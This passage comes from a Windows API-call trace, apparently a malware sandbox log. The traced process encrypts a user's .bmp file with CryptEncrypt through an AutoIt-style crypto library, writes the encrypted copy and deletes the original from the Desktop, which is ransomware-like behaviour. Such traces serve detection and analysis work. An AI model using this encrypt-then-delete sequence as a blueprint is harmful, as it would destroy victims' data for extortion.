(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0133.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0133.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0133.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0133.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0133.521] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0133.521] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.521] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0133.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0133.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0133.521] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x6a36, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x6a40) returned 1 [0133.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0133.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0133.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0133.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0133.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0133.523] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0133.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0133.524] CharLowerBuffW (in: lpsz="byte[27201]", cchLength=0xb | out: lpsz="byte[27201]") returned 0xb [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a41) returned 0x49bded0 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0133.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49c4920 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49cb360 [0133.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0133.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb480 [0133.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb480, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0133.525] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bded0*, pdwDataLen=0x144e538*=0x6a36, dwBufLen=0x6a40 | out: pbData=0x49bded0*, pdwDataLen=0x144e538*=0x6a40) returned 1 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0133.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0133.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0133.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0133.526] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0133.526] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0133.526] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.526] WriteFile (in: hFile=0x258, lpBuffer=0x49df248*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49df248*, lpNumberOfBytesWritten=0x144ef3c*=0x6a40, lpOverlapped=0x0) returned 1 [0133.527] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0133.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0133.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0133.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cae20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0133.528] CryptDestroyKey (hKey=0x41ac140) returned 1 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0133.528] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0133.528] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0133.528] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.528] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0133.528] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0133.528] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.528] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0133.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0133.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0133.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0133.529] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0133.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0133.529] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.529] FreeLibrary (hLibModule=0x756e0000) returned 1 [0133.529] CloseHandle (hObject=0x2a0) returned 1 [0133.530] CloseHandle (hObject=0x258) returned 1 [0133.531] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp", lpFilePart=0x0) returned 0x31 [0133.531] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\lb o7wz9.bmp")) returned 0x20 [0133.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0133.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431ded8 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0133.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431ded8 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0133.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0133.532] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58235170, ftCreationTime.dwHighDateTime=0x1d5e3d0, ftLastAccessTime.dwLowDateTime=0x4ffd3e60, ftLastAccessTime.dwHighDateTime=0x1d5ebf1, ftLastWriteTime.dwLowDateTime=0x4ffd3e60, ftLastWriteTime.dwHighDateTime=0x1d5ebf1, nFileSizeHigh=0x0, nFileSizeLow=0x6a36, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lB o7wz9.bmp", cAlternateFileName="LBO7WZ~1.BMP")) returned 0x41ac640 [0133.532] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\lb o7wz9.bmp")) returned 1 [0133.779] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58235170, ftCreationTime.dwHighDateTime=0x1d5e3d0, ftLastAccessTime.dwLowDateTime=0x4ffd3e60, ftLastAccessTime.dwHighDateTime=0x1d5ebf1, ftLastWriteTime.dwLowDateTime=0x4ffd3e60, ftLastWriteTime.dwHighDateTime=0x1d5ebf1, nFileSizeHigh=0x0, nFileSizeLow=0x6a36, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lB o7wz9.bmp", cAlternateFileName="LBO7WZ~1.BMP")) returned 0 [0133.779] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0133.924] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 